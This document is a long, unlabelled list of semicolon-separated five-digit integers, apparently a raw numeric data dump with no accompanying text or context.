58173;24721;37183;21131;43530;12953;46586;12219;26541;47351;35025;38297;63018;44142;55292;38630;58634;26480;17402;36205;45736;38730;41484;35880;19390;63996;40253;45833;21985;28555;29264;27511;49490;35556;43084;32733;33875;52392;15208;37721;61604;23154;65085;53929;60183;46029;20838;29988;33530;20380;41177;58822;10761;37023;31813;42523;29134;13429;30704;44354;41521;16000;13979;54105;49033;12350;43485;10469;55270;62330;33187;55165;62059;34068;56969;51680;60581;61103;51752;34755;53993;28777;41964;39535;38848;16679;35685;59755;19577;28534;18238;34383;55654;45130;13536;38471;28568;63860;13889;41002;46633;11334;25036;19681;62213;39503;38745;65720;60650;47394;12647;60925;16984;63594;55783;61112;53230;42024;37099;55161;38832;34482;18013;51730;46540;31610;16134;24232;64937;64771;29586;41779;22178;39097;13373;13283;16600;34014;35449;32181;15670;29949;58673;64976;28216;28523;34124;14084;40559;22423;41428;25483;52748;37850;18962;15758;49746;38549;17742;57217;55678;63687;27136;42476;33940;17741;36359;14634;29097;52526;15375;19099;11685;30314;28570;15025;21176;27375;54692;11347;62712;15848;36618;58543;50406;12885;14888;58569;51256;35566;10847;31278;18365;33789;42572;53153;45264;17819;59035;14287;54998;20359;32440;49086;31256;18877;45143;58043;22598;17301;62089;63375;40353;63358;16281;15074;32041;55368;20704;52636;14592;22319;55716;53287;22794;26802;51117;21545;17603;12799;64741;41388;29778;34622;66146;45198;24050;23879;51128;29361;34638;38711;64667;15924;44804;29284;28683;62101;54870;36251;27732;60398;27678;39534;46697;32047;58802;38020;37686;63960;29457;55632;24345;27508;50171;53824;54902;10565;12355;64459;26231;64421;35769;20289;10380;66632;64951;17293;60288;57821;54890;64059;60148;54963;27874;37426;17658;51470;47174;11110;63163;60794;53060;24827;28582;66550;15182;21647;49666;41294;60518;12049;27054;34745;62750;18658;64551;34855;34808;29118;66886;37349;35249;11756;37152;34715;41019;33561;65488;18660;39747;58221;58951;22801;55653;40515;52015;58171;56818;51134;64553;45155;51570;31943;66096;57953;23093;60074;47544;66674;11847;64082;25469;36790;32909;33322;51065;19280;17013;11383;44214;12431;57551;61167;51443;19500;27222;29680;10644;22093;65971;34016;26812;23023;49115;53833;25845;40352;26158;18930;25017;56741;28272;63299;19363;17723;34826;61790;25962;10632;33666;57744;62874;57642;18920;46042;25623;32575;18257;50881;19141;34687;22344;39919;20447;12742;26362;34120;58875;37515;63214;31190;15571;40459;58185;50473;23990;26742;44213;38923;16836;46032;13197;23890;15823;12524;41653;12498;11515;47217;64823;39080;28992;52813;63352;28186;31760;51818;18769;29191;64188;28057;46655;15739;64907;58140;49871;41769;61743;52794;20776;12384;34287;36049;34922;65596;16828;22415;60022;29456;66880;31121;26247;62274;28924;20911;36095;11593;65586;38042;20098;52095;49097;35069;32834;48573;64089;65078;36670;26872;19963;13492;17634;13028;17533;30691;22585;48631;43028;29261;42079;34116;35972;30584;17173;24251;63271;25602;37415;43469;31449;49718;42310;38254;15234;35065;53630;38818;38939;64538;21099;35478;36029;46589;13702;23237;30615;51629;56800;42149;61045;59455;11487;10538;52423;40852;29310;16488;41793;40234;13658;14456;64831;23089;26879;14068;46428;35661;41909;52761;45592;53943;64021;11603;51126;33782;13903;44736;45493;50482;54074;11743;36796;24417;54251;20636;64830;28317;34800;65411;28469;37093;55336;51874;17415;29210;52917;57183;14867;38846;16544;15438;54202;48812;45124;19514;39611;53813;63807;30361;12341;66419;34354;32956;11107;43808;57760;47199;22285;60668;23530;44371;40430;57771;13322;20222;25411;57457;12859;39784;44097;56464;49213;33962;52824;14927;43900;45748;42496;48345;47884;14605;15927;30478;50979;37068;36656;28495;65726;27842;61438;14556;33984;61531;19345;31904;34109;19606;26312;34514;33503;41353;37000;18822;12362;56443;14580;29725;41652;58517;25220;46506;12600;36163;59737;33401;32327;41376;21694;38552;56840;29994;31222;40060;29796;49128;11769;52013;23309;37318;57711;62722;41194;30682;52088;59236;51019;32621;59461;26984;52159;24437;29465;45019;58738;38787;51956;45322;29295;52239;63646;48910;17428;20737;51366;33148;44547;44467;34368;61927;34536;20584;43570;59707;45387;38189;42556;21136;31678;14410;26352;25069;22624;28375;16837;54358;65757;16054;65983;11161;15409;66438;56677;60175;20825;31490;26125;55408;17541;55921;25188;61099;56152;21916;16169;19462;29338;43568;42876;32541;26151;14902;40534;48847;40663;19550;43491;57236;16969;66624;39627;40472;56885;43320;19485;66360;27847;27709;46046;60466;50905;37403;24717;56672;41138;49349;56526;62907;53382;27604;58895;33910;26969;12660;51828;40350;53834;15486;25951;50233;46294;54408;31386;42747;24990;10802;15512;12803;46265;32237;52400;32937;26427;29879;26331;60550;28395;19921;59805;12426;51732;53897;20707;40276;45487;58459;50426;66830;17413;65461;57292;52237;41861;23045;49361;37600;61248;66763;42532;21951;31696;61816;13902;13859;26583;61071;60215;38372;23417;48819;53591;37123;23785;17841;36400;21721;13771;41413;13954;63989;31130;31632;31139;13855;45655;57269;65945;50388;21035;57808;35790;41197;18592;23299;27397;57358;62062;62547;55341;31277;34742;24117;29427;30488;62578;48249;55854;20261;44474;13782;46966;16339;42564;35001;43558;19667;66421;34698;44029;32576;54679;54354;40314;18413;51878;22004;17318;41127;46333;56790;26999;33500;53847;15075;57546;45025;49775;28544;32866;47717;26686;10936;42454;44033;50125;20854;60762;42444;50999;35447;20544;42039;43584;47155;13786;63274;27792;36034;23630;10282;34603;63424;42300;26582;20476;49109;53264;33387;35522;36328;39974;22143;66386;61986;26182;32669;44283;21110;49083;44289;48266;50879;33598;48933;51630;45648;48806;48813;45065;53660;11821;41982;58086;22438;42456;18318;50796;35218;32305;14772;50587;41727;11213;45286;24412;66074;30730;13897;14168;11457;18591;44645;63506;11737;36421;22291;65637;63017;37969;37839;35507;11006;21688;42544;56621;61522;21745;54675;43449;63565;37396;57166;26961;44347;16802;44919;61746;26105;18111;54883;47412;16869;44789;34335;56614;24987;65673;64050;38428;66879;24137;12663;48935;29712;32867;26905;19305;44420;62889;14636;41735;45342;52833;48779;10969;57842;13230;35044;55309;46695;51993;22831;39199;23194;63545;30011;15652;64804;53297;23479;15814;39067;42217;17981;42906;34403;60381;17982;49200;29542;25639;43026;39754;49179;14637;36027;48404;25599;15622;20749;13939;27688;16734;61630;22725;57350;24919;14295;43598;55864;57863;48198;18174;22315;20408;47877;15663;32174;49845;59277;26011;23629;13519;45039;43324;26710;16368;56639;20956;47327;36981;27839;13809;26142;37809;12849;14498;33051;10652;20503;25672;53405;12295;64763;62020;25291;55327;40168;54704;29941;62019;56006;54329;54533;46657;39607;37906;44060;64817;33008;62473;32191;17461;42435;31220;45846;45044;36549;44733;34393;20513;20551;34022;24426;22952;33941;55139;22146;30927;22795;16013;20438;48747;66963;64698;25658;57092;42274;16338;34762;14982;63574;37822;56054;49603;18530;24333;34793;55949;64814;57445;17162;52642;33786;62950;52949;17655;49423;39457;46144;24843;13927;21256;25150;16490;64360;17091;63920;61561;63338;54068;23654;50447;41806;29874;35091;33497;53414;40379;62491;32936;22085;43222;36508;59973;55670;46133;52709;53588;13108;45758;51036;63690;59857;61633;65658;61190;43444;31163;11738;35558;16400;65046;43939;11536;42732;65264;15000;25289;33248;64431;26397;51807;45640;55433;18730;60469;12525;30069;30279;51471;54236;48155;21192;32158;57073;49934;51808;20183;42247;40385;65512;57454;26874;31002;13706;47438;21143;49143;12821;36219;64866;43381;22022;14039;27833;14320;12207;13074;59983;34816;59948;36030;46978;33906;62099;32885;29688;27078;53273;15918;51407;32907;56013;26303;13405;32124;16184;18748;54527;22175;64634;45451;43115;62175;46635;53575;43208;60150;48247;32152;10269;65026;32554;15487;46779;23912;27798;66739;16944;14934;49284;55138;38453;10539;30852;64378;42548;45010;55586;22042;55440;14341;49227;25748;54014;23738;27593;12897;17762;20094;31240;61893;13052;41285;15569;29517;48737;28033;13471;18201;22071;65687;20012;13549;49598;59005;13202;38964;25293;65053;66615;66562;51120;10461;25274;41934;30842;28977;16901;15517;46322;19588;53887;39018;16236;62058;58532;39914;20497;39741;20830;27778;65587;60271;58094;57586;49937;20364;19884;46026;57993;16079;56173;10653;43241;57616;36225;51330;66859;54541;25033;19306;26089;55276;62199;63926;64800;39121;32320;30907;49948;40841;47193;28121;31996;17311;15307;61805;25319;16745;22766;28218;50535;49777;36628;61297;40647;47396;43988;29496;33458;16881;46023;63459;64200;65245;56322;24460;51297;39716;40983;31728;57319;64262;20448;20181;29801;15281;40884;40416;42733;48795;43133;21416;57784;58652;53631;63340;23296;35898;22316;34921;21247;13712;28344;44514;57981;62825;64547;26540;45478;40053;60903;53714;29878;10199;60769;64222;42226;30166;36675;30071;29469;30660;54370;48599;53782;41614;53646;35424;30441;51519;64104;55994;19153;27598;32144;26989;55488;51769;65532;46637;17786;55411;31995;63285;18435;62696;35482;48476;56129;61301;50206;15964;58274;27814;17083;50487;15177;58055;62006;32713;62838;45018;30701;61758;26368;43801;24920;42073;59977;46141;13331;10444;60451;58553;43124;46971;61053;45102;15830;58664;10546;51472;65960;63830;57647;31554;23460;43712;10552;51949;60896;59687;22648;40061;33897;15952;28763;32607;15332;30626;37450;66509;13374;12961;24884;39400;33580;61753;48639;45822;27891;25347;62014;34465;34362;25787;29381;60365;40152;59731;49085;43609;11082;64406;59365;19712;39775;61887;13142;63001;54724;26733;34734;60763;28768;23432;55093;25997;33436;62063;10575;56727;63616;42376;60569;48667;56518;32230;22752;64968;47681;24988;15286;15524;13664;23571;31669;10981;23207;20439;23227;20393;52615;16180;30476;42944;49001;61227;51765;47906;28987;45564;40941;10111;53632;66409;21830;50466;44459;61320;42074;43407;28884;23240;59952;55810;62811;24614;38173;17111;54045;34151;30503;30885;61024;32267;22123;39983;11180;43265;13065;61060;57006;17595;30302;52071;26684;37989;15219;60720;45456;65536;10457;11747;39277;50039;51294;57141;58980;62052;54128;40397;45630;23868;14878;40623;55121;51713;27976;14999;61399;56756;51530;23314;56964;24910;32742;63689;49515;39737;14539;48231;47823;19852;20712;64787;48738;53738;45533;52875;55499;27550;54531;39158;26827;57890;11364;31714;52310;38363;58151;53475;38257;57070;62455;33185;16863;50807;65810;15756;30155;60217;25005;29740;27675;21478;24130;12303;62782;35892;59370;24970;52181;30328;44448;61547;15358;12646;22874;66900;56089;21783;11615;24284;45256;11229;20486;26314;57205;13442;18554;50190;49892;61057;31291;65773;59330;51014;53030;16095;25277;29630;59635;64546;52749;34472;66054;20771;44204;18674;47108;49447;38564;61637;59513;42293;64255;60705;18021;40838;60302;11367;58914;51699;14848;14369;27528;12406;42202;15637;57077;62415;56172;54094;40437;51475;45106;56595;17675;14896;21920;63482;65121;66657;53259;21454;53460;44852;63054;25284;34663;44900;60564;58777;27813;38444;43635;54703;10272;57507;10912;58955;34274;22210;21517;23898;59257;24956;43223;14272;52633;58225;30735;24979;60560;54476;47334;47739;14891;59026;61725;10135;59654;26258;61546;22628;65048;64967;46626;60573;44305;26491;18011;30998;19700;52657;21081;60629;45792;10146;64609;56901;23102;35916;18845;28480;14119;26544;33298;23368;58109;55605;18184;43169;22139;56398;27564;44286;12989;25876;18487;40676;64580;52335;63963;25394;55372;13280;28825;14536;62104;11326;28039;45929;37757;49713;48956;21684;16706;55827;16637;38513;25138;64975;47094;27174;66341;24366;19986;31829;27480;19226;49644;33734;48699;35099;65280;21820;11309;18399;25945;23283;62924;19543;37136;57547;53366;26152;24606;29209;39180;50017;15669;40803;12016;15546;46353;16500;43992;64435;10353;38210;32776;66799;38873;12398;49918;57310;14793;18452;39127;34706;38697;40564;15718;65841;12071;37289;40573;36324;30960;40731;39875;27726;40789;59606;57272;18271;54122;62669;44580;26270;39990;15797;42166;46260;51378;18502;66884;66849;53907;26454;19716;15229;57093;16189;17395;58809;31018;44469;28930;32831;41926;28119;22089;50418;59396;55677;34404;36189;62785;18923;63540;64189;42153;16285;30134;54005;61661;52050;14993;14022;66176;35271;24483;57303;32033;36702;31876;13566;42590;13912;39213;32999;52787;33781;13058;39546;66853;52349;25279;24705;29931;58259;55910;49537;57995;47769;31868;25094;31616;17639;24076;12388;16515;16307;51817;25486;32793;37449;10622;55583;42165;58520;30895;19311;51984;29328;19668;34658;22668;66109;18496;33762;62694;16379;15073;32239;62341;24498;27807;13185;50284;27144;39782;50766;57133;39159;58576;22424;61538;21399;25860;51924;36990;40055;11678;22645;11001;51108;10838;27345;27428;22644;21900;64836;35402;66422;19132;18369;55646;35342;47060;50112;63316;16556;14271;59682;34176;57657;47695;56850;57274;31960;20746;10171;39928;30769;14053;60496;14850;62408;48332;63768;12910;51078;17046;48930;51906;34055;33807;28050;15301;35976;47332;33389;62840;29022;44487;27420;19951;54736;14940;26085;13569;37393;48340;11676;55219;13870;19301;28067;54849;21556;45485;47793;16290;60239;11555;64970;52143;33665;42864;52393;25020;17784;64307;41549;43587;40516;45855;10421;48979;27990;30175;53394;58268;32870;32045;53937;22925;13721;58597;57186;66500;19078;52006;47480;41758;23349;28094;18559;56127;36001;38659;42087;62520;14261;28505;23230;57251;20496;34193;36006;56125;47516;41153;11341;63117;11671;53917;47036;30008;59588;16705;47805;36514;43342;66392;43643;42768;18038;23521;56888;54606;23913;56193;58066;60554;48171;63317;27027;10223;29426;19296;50094;20090;57984;54195;13922;13304;43805;63786;53585;61691;33841;39252;51311;65104;33985;57561;43672;15006;19624;27348;11935;39773;51618;58934;19369;33926;66871;55422;30729;60141;25265;12088;15727;43539;63273;52580;61508;63998;54477;19959;60354;48223;12654;52708;37189;50717;40928;52503;43440;30749;62718;39191;51597;55243;37477;21929;25203;19097;12521;18689;66197;23186;21848;41454;50013;19013;59130;51091;15012;19053;42791;60960;53687;38144;39751;63630;37830;11742;29204;42508;11427;23790;51496;29766;27650;10807;59093;55870;26952;66450;34123;56842;62424;60213;60664;56731;58537;14965;51898;35311;29820;28574;60294;61582;19509;33711;53404;32680;40635;42591;48538;40317;21740;60583;22240;10271;56748;17317;39039;18465;63422;26705;10929;16835;42245;40130;23930;19059;13718;34196;49399;38854;21232;41162;54321;29726;39176;11951;56094;16074;53737;54626;59639;50214;15135;40182;34268;61973;42819;21045;19954;33737;59122;66891;56400;14852;53004;38464;29159;60961;64590;57386;34129;10885;66591;59029;32225;64174;37612;40826;61705;55458;55297;27831;20429;11937;19876;29812;38167;26964;52873;62013;26068;15251;40608;25960;62369;38204;11855;27149;66032;12789;33815;18810;25232;41242;21489;48718;49223;26296;10206;44957;40997;41872;40560;24280;20255;59449;13882;61380;18193;21862;16793;55982;43534;17233;55439;27711;13222;39743;26250;23788;24784;23034;19217;63221;42078;60695;36976;47288;20358;61575;37413;59447;30906;35854;40283;52776;49590;26078;51160;62904;20342;39921;28431;24603;21961;51526;50603;50318;48610;23547;24140;44830;41119;33886;54415;22381;63647;26519;33795;19205;49453;33053;54959;49350;15482;16553;44519;22976;35594;28647;41655;21899;31930;19064;53379;22006;49829;13917;15954;18031;37594;65407;12069;19789;54323;24962;34107;31878;48472;46719;24789;42213;14941;41460;61307;36727;25182;30642;14069;64809;46375;30999;45469;45461;15072;10307;60326;21370;63122;17222;64192;20669;37247;43097;28170;16851;13543;53547;15215;26118;66944;16433;40548;33054;26266;19450;14881;33899;19190;38898;12263;18379;19809;11417;24370;32410;18899;48638;49488;52056;38809;32691;28969;54603;33188;27493;53406;39624;65688;20357;45087;20718;62419;64963;37401;49526;48971;39641;31559;48839;31920;45811;30455;27249;33958;55835;47894;38819;31894;55875;46440;41295;18109;36971;16548;65860;60827;56698;64699;34534;11715;37739;12718;33025;60211;26600;18747;27035;27315;24557;27221;54383;13271;52939;52774;11360;55217;59560;59562;66537;34389;58480;18857;49066;49121;62605;22035;23753;55065;55843;22361;56059;12121;26837;66701;61844;11912;11613;34557;58959;14762;43575;13547;57419;37959;41228;31444;24080;40452;45109;35519;38404;13767;47372;55574;60430;13683;35776;38728;43252;39832;36924;60678;35010;62823;38524;54745;15282;15647;36644;18447;55599;21998;65031;37831;31227;48762;54240;58483;18428;57767;62400;62273;42828;13727;32782;46017;23953;62793;19781;10946;35227;19883;31673;14812;17582;11789;38427;26228;30740;64269;62429;66883;20983;59801;10053;25204;52782;30114;13124;19682;56169;16405;33226;26713;50688;47348;47740;60965;23664;27481;15855;64578;30062;25269;27638;51972;43130;11638;28963;29218;28207;15304;57080;44223;61463;34231;44618;62134;62849;64901;61286;46401;20001;59290;23846;54496;58930;41808;60835;61155;25029;50876;24731;42790;57432;52556;60637;13459;18287;34062;11580;50143;38288;65772;44146;45389;11126;35195;51219;61270;52481;22951;54857;52913;51170;10311;48554;61539;58457;30101;61901;43739;63749;62145;66819;23839;42467;10441;41714;49727;50654;38344;13829;63566;36979;14714;14518;58627;11617;24457;20177;41540;29521;32071;60707;62494;47176;10081;55504;17993;18164;16317;44243;16444;39151;36641;42390;43315;57284;57827;33613;31656;42275;41182;37677;51923;41904;22258;17619;63941;54135;22408;47052;21980;50376;17025;66171;50664;55357;29479;18116;51672;18806;65657;58668;42469;64135;51861;21938;64646;61823;65010;21420;55419;43667;37748;59788;41745;58098;33030;54889;59364;30827;46900;39163;51500;38716;28613;50135;56341;23231;32478;65764;31415;39803;65328;61953;33774;66640;41045;26196;55052;63161;16659;64263;61647;59470;50869;57142;40668;34336;19775;50248;24258;58845;17731;16415;18402;31484;37492;62382;40681;56521;36444;31791;59339;14909;20586;18798;24999;22215;28486;21587;62658;19738;50395;46491;53470;31618;64137;39373;55660;50541;38285;24322;64453;14520;35016;40554;27967;14996;39656;34032;14828;41217;57374;51010;14028;28815;47212;14440;12374;27873;46269;30318;15123;59353;31319;35947;57155;18340;42779;22075;45344;34508;22920;22677;61549;61043;41766;45234;49687;54000;46861;55639;45285;33285;22942;62576;37282;57099;54309;25798;41308;30590;45249;11419;35196;10454;61505;45973;30967;43331;63172;57363;48723;24386;24167;32869;62821;59575;52115;13164;28640;11093;22137;65465;63514;14945;59764;51885;14082;41462;51787;61483;43414;29529;33247;20394;60364;16912;23733;54530;13027;40620;66714;65561;48435;35067;15313;26782;13907;19039;51420;21268;11721;18538;14467;19804;14846;44141;15634;61783;45653;30932;21747;41557;54296;12558;61382;36350;60392;20067;39432;29221;61928;41683;33260;37223;55213;36303;35276;60195;18588;52092;28084;32330;28567;60519;21802;21776;58018;60682;48850;30750;60035;35145;58079;45544;44501;13376;12386;36192;65105;46504;43506;29407;50959;53221;31466;40519;29792;15226;42417;62567;33698;64008;63040;49422;28399;48178;27888;57787;32851;30034;26107;24608;49496;15441;55102;64410;62324;59369;43216;22856;43870;15931;13968;37616;47575;46222;13930;15949;47000;53190;61029;28059;26120;63814;49282;12027;38172;42536;40697;14820;45984;36154;38680;41778;40741;18619;18918;29502;43262;16726;38345;48265;23609;47896;42006;64120;37553;38443;33562;48730;26825;40875;29087;39521;40980;46593;10964;30778;26931;55016;50983;36214;18557;57031;39413;14724;14930;62487;29086;50648;56796;30316;38452;20731;33858;55056;43202;40100;46424;18312;35923;60393;13810;45881;46532;26680;46443;28394;25920;10597;48227;29473;48170;10358;31188;16123;28758;63504;61162;12847;49545;24694;58971;65161;23389;12208;62833;48684;48641;16070;41253;57592;61972;37609;19477;11486;37245;18758;29024;35595;48480;32559;57493;55370;40673;54735;51201;31739;32531;30450;43079;56667;63388;30372;41291;60730;64447;12683;29108;21296;22588;59845;64092;30996;12603;66539;23165;48954;44932;11645;50240;46234;49883;53279;58261;23926;30580;14114;43561;25587;57629;55869;63095;61959;18087;60578;42746;52736;63330;65387;58843;63662;58367;34408;65348;50573;31226;36062;25111;38437;60602;21986;56787;65839;61614;19847;16808;26436;33839;38542;35383;52077;31160;51512;12095;62634;66041;27699;31476;25909;51932;27743;64201;20844;19949;39037;27632;12240;19661;29884;56203;52040;47525;26615;10488;54264;56711;16394;24228;58355;54174;46122;49872;44735;56050;28685;55468;44731;51510;56501;57582;37482;10208;60623;65316;36646;27870;31248;19220;63976;35498;41487;14409;25695;56948;56198;14207;10077;48401;39247;56226;61712;17066;51123;30908;54599;54782;64593;38523;30980;46156;55825;65142;29377;46856;55520;10324;58574;50916;10560;37417;18846;26446;48968;54751;25790;53464;31720;23206;52386;28781;22145;37238;65975;32520;47792;35461;23961;20981;41707;20594;45022;62179;28299;39433;28013;11198;20547;51829;46472;52968;49357;11108;26954;43657;61173;25634;65077;48582;32935;32458;42250;62342;46366;13299;47573;27086;32921;66414;52484;47302;60651;10639;65537;34566;56777;44949;60340;20151;37071;37918;33259;29828;50693;17547;59827;35952;34577;53090;18773;27680;26771;25976;37723;39947;35500;47478;52746;47839;11733;11225;40746;29079;19813;65756;20036;34838;19848;31997;42089;60847;58461;16116;51487;23605;47015;35955;66680;40629;58177;24716;64168;46625;22312;26532;50703;36111;30564;46712;50998;22466;30618;27319;50975;54116;41440;36073;63351;40425;30847;33133;30425;51379;32579;32485;60534;60717;56974;38967;39268;63796;62936;31684;54605;28976;29516;61223;65958;25564;13458;54407;56574;61914;27406;50069;56072;21208;60086;23182;60805;33838;66565;24144;29962;41379;32685;41874;64923;14811;46664;56319;41717;31974;30002;24802;32698;53479;61741;20597;42928;66100;20546;34619;65405;56287;10325;58833;12818;26246;48212;50166;34938;32608;58301;62095;17817;18907;66275;66521;29641;44921;17701;64398;41367;32029;58329;32550;47530;64139;62826;43107;51737;55421;51602;26323;42156;41056;20038;44446;41726;50196;22038;34168;42206;58932;33884;39643;61490;12844;45749;57411;12443;35282;52929;35106;17550;30169;66672;53348;58973;36782;57721;64790;61515;17480;26091;62407;41750;58442;65957;16826;21878;17195;66039;25362;31693;28326;35958;52491;52231;34796;15795;18782;10515;30260;66218;54711;57710;18869;65670;26640;16094;10070;54730;66970;59644;31003;51081;66582;46407;44468;48984;65162;48835;13403;23732;50530;51667;42832;49740;61104;41313;32397;17744;51931;51886;11827;42161;49465;19574;20687;56404;35562;66454;51796;16512;35935;65444;58926;41499;60640;19434;19609;39212;48165;20285;30496;43301;53607;58725;46825;17755;44720;22147;51209;17552;28981;47729;34224;23457;62214;14094;20493;36853;19498;16408;59380;42283;64036;31194;37185;32461;60115;24321;48771;41785;39384;12835;40535;65022;34228;37675;10956;55028;16787;61870;27033;18249;60038;43080;36921;24087;45885;15116;48424;65499;33487;23996;35405;49753;62790;48752;10595;32569;28235;45233;48328;40756;11831;35945;53788;29292;10570;65359;48809;28278;58901;15205;10197;54640;17631;47887;21696;65483;54973;47338;15966;57109;57514;60874;20399;13106;23364;42233;34953;12813;51200;25925;54263;59106;42109;66727;55800;31840;52971;52132;34121;42152;47055;16960;38978;11085;17759;53092;58772;48219;21918;50553;32632;15454;28432;21589;50622;61488;64368;51615;36380;36626;66198;26411;15241;51596;15668;59430;43640;44936;29747;49758;10251;37467;43970;37817;49730;11151;20217;47091;43063;22282;24294;61979;39580;54373;20154;57517;43002;48483;59406;66812;13072;20224;58186;33601;65014;31429;54468;16513;63127;41044;11477;34664;15575;31148;39725;32321;51971;57922;48473;51460;15633;51780;43579;45151;66022;46715;56438;48445;17481;23485;19027;63805;57595;66810;27046;11471;13341;55483;42939;25368;43399;33938;11164;66346;62917;49973;55712;65357;31245;58684;18280;14008;61617;21070;26537;29052;40497;26780;29053;45397;39497;48263;18601;29573;31060;18589;24008;49185;36201;29588;22111;56855;36363;28743;27464;18764;13756;37291;58904;13584;45462;19686;43263;12116;16348;41346;13324;27991;29719;38364;31020;48207;24536;60090;27869;61993;25528;32883;50031;26459;42705;43542;64314;20531;16684;11393;23477;22256;53341;31638;48945;40614;29041;61670;62286;44687;63174;60994;14492;39454;13221;12877;11544;22671;29414;63401;16542;45209;17629;44248;40723;39479;11316;14033;15615;61685;33023;63721;63553;60149;50374;23906;65676;53084;35751;50158;58756;26186;10958;28786;44978;35247;49480;15778;20138;65180;30629;38713;47690;32387;11303;48350;45362;27255;41089;48508;46623;31029;16597;40820;23468;41166;11550;31966;49720;23037;43679;20554;52268;53831;25563;63595;55125;59320;26273;54237;65607;58778;63502;40814;52516;57353;44582;28290;48244;53330;28158;18939;21345;27673;40316;63201;25183;22623;35207;61558;26422;64566;28644;50772;27837;50779;29611;64924;43138;63279;21502;45361;38436;25885;27304;53613;40364;10390;54798;46114;54665;48300;32768;52396;36819;26225;34154;11607;33252;20806;52344;11448;65283;14757;12237;36895;42872;22196;52297;18385;60635;60039;60192;13525;36132;38008;45030;25841;22625;55267;15292;30845;59078;55275;53863;45754;25145;61139;64920;49246;65880;35336;12597;37430;63488;65007;55424;28878;34651;56559;23255;35126;59782;53669;29371;22949;61571;53999;13941;35810;36510;60760;38920;38077;26854;45298;28136;65451;37259;21891;53002;29120;57579;54230;11267;50301;47369;18732;44035;48869;41598;22201;24652;38484;63542;63315;51265;41946;50064;18078;46163;20706;22667;40203;64853;36332;45091;40351;60736;53452;24996;42474;42098;21755;53312;10073;42515;61601;58672;66720;43577;45742;27071;27779;56638;63150;65192;28520;40181;21810;24209;33967;51953;45258;29154;39238;50470;53255;54456;44380;48497;53492;52651;38999;19889;46812;14450;20343;54120;60033;58100;19777;45606;21123;30291;61482;23054;66751;43122;40233;39065;48926;34467;22663;33461;25097;11183;53132;16938;21331;34379;40744;13139;26679;33721;26146;23762;65426;66538;18368;49437;17100;60765;12533;49938;47679;16879;56860;29935;40966;11622;42560;40111;43139;42655;39655;26498;57448;51083;36129;35008;20107;41679;12451;47761;53421;66652;47907;36277;52612;53096;56444;27786;15175;59443;58315;49731;45733;58312;50078;15491;14544;36190;53298;40059;43442;59569;20356;51687;24768;56921;26366;27285;17743;33758;58878;15060;10455;57506;14515;13444;60206;40637;14036;20750;35159;29536;44938;17244;12377;51663;64808;43690;17382;17738;47260;49873;59520;19441;32269;28066;66400;66600;48602;29267;39077;53111;49500;56080;21523;30484;25008;22909;11523;24303;39085;60425;23111;50322;20975;55043;35862;30268;53589;16460;50458;53561;26987;66105;37795;45710;51761;19988;10805;61374;27309;39836;58667;35104;15314;10646;22994;57973;39013;12410;37210;25963;62153;33570;10482;18614;21273;48622;28005;11915;26280;31614;44066;27606;28464;33707;35570;28795;34023;65095;16576;66297;34893;35320;18858;42357;62969;16783;57267;53712;59358;64212;50377;51473;19495;28502;23162;53064;50550;49592;25491;63587;17366;19066;16623;44291;16155;32162;22320;28512;51488;50865;38500;64942;10278;38129;15068;60140;11488;46437;33235;43650;45780;57532;46001;25531;26951;40333;48661;66379;44185;42014;45059;52212;10110;65496;29481;47402;63974;25751;39193;14189;55665;18076;26915;64158;11946;51012;21255;18664;28015;11783;11695;54205;21686;36341;12455;35240;29164;15583;21465;15103;13529;29195;13541;14211;10025;27250;36002;53918;43538;44974;65233;26587;56028;23482;42100;41849;54622;63196;62433;13970;16176;58101;12435;55936;22474;62652;14953;37083;26555;12920;15270;39287;20331;32955;14568;62060;50751;35224;26940;44993;42891;18639;66380;47454;19191;13785;27762;30856;45583;50756;26402;31885;27736;41587;22394;63119;18630;44275;65520;23118;23751;63610;55273;29445;30222;23607;59937;27655;66838;16109;53088;61373;51594;55803;61010;25543;15803;58720;19698;63558;59919;31666;36449;66612;13694;11233;20890;41319;45919;10613;63937;54576;21493;52323;10537;66575;26558;16998;54177;52928;41468;37874;14573;44842;45354;51913;65674;54636;24103;50897;52681;36959;20729;40101;12502;45913;23250;56386;15088;56634;45251;34377;50864;50073;38046;33674;64603;48191;30208;22217;55899;45767;60269;46904;45215;22122;19478;56556;38505;35607;34990;29694;29009;61174;18036;59492;41239;37908;38067;46341;14279;12693;58831;66948;35293;43893;47029;44170;42495;32401;18290;60395;36758;38212;65843;23628;12661;29406;27912;34318;12682;66092;19507;21382;63307;12446;58620;62588;20109;30572;37358;32344;13789;43450;40524;37541;13329;65543;58432;11654;15498;47375;28928;47240;63377;61081;22252;57848;58335;55088;17153;46416;23603;18424;16631;61709;39453;55320;51849;24670;44447;40999;53108;47130;37489;28308;64014;34076;38884;43367;41026;55004;44738;29029;16071;35095;12865;47796;32983;48397;55692;52291;66965;40943;59283;45421;24779;37105;59705;34546;10261;29289;13498;64397;59757;64179;47273;35212;61776;37913;36074;10892;22987;51781;53413;18374;50640;66190;18712;39354;65008;16459;38071;34731;65920;18598;20400;12506;15690;20574;52446;60325;66832;19666;26957;25846;46906;60734;42137;47269;59008;40358;43741;66155;60508;18876;44127;10720;50692;23491;55860;30031;14439;25680;15024;19228;53113;22849;31975;23290;39259;11373;35404;52613;45324;32206;63288;13439;33312;37696;65818;46941;60752;60696;33320;12229;49451;10665;25827;31338;27018;58513;33970;44826;61212;65002;43726;11097;20412;50113;46245;28164;36101;16905;47471;10520;41962;35779;41169;34537;11980;39062;64288;42423;17549;35820;60001;10194;52482;12627;34361;41400;33616;34935;55185;54930;54975;53623;12081;57370;46166;21744;25369;29499;23155;54906;14647;47572;40767;17493;63412;60473;59014;24421;66021;25359;32678;27401;31722;21513;24883;50180;58559;61660;15742;46377;59539;21624;61032;37759;18152;64098;33881;15822;52160;20213;56915;46273;61042;31558;25523;40834;44364;40199;49147;33526;64981;48797;10400;30003;22809;12477;35267;13992;42616;30412;43468;53282;40241;42618;22503;47315;65069;40528;56793;49045;10759;53557;46863;53100;25728;30764;62365;65067;33514;33245;60693;55545;40410;42999;41740;62663;57791;50943;39134;66588;42717;65395;23113;12952;62046;40584;40831;37899;34165;41703;48379;56857;20092;18643;11952;56092;18110;44674;57307;16314;13345;61883;48918;33849;66770;35108;27534;14648;12569;16384;66559;44315;11563;37611;63138;29710;61108;28578;63552;13162;29742;34264;34266;18449;46857;44502;42090;44688;57318;36466;11299;60861;15504;61487;44247;15725;58408;44483;49482;41732;63812;15693;50015;18256;41501;14334;29938;32740;13700;14892;23516;24858;13026;31778;62564;41809;25040;13723;54031;44326;25206;21642;48427;12657;63101;10980;20560;65460;17069;38135;50176;44813;18770;19714;20659;58167;54687;43431;16615;11547;24334;41148;66494;16822;45147;14517;44703;51679;49841;16945;50941;53225;57190;53534;35848;45496;61795;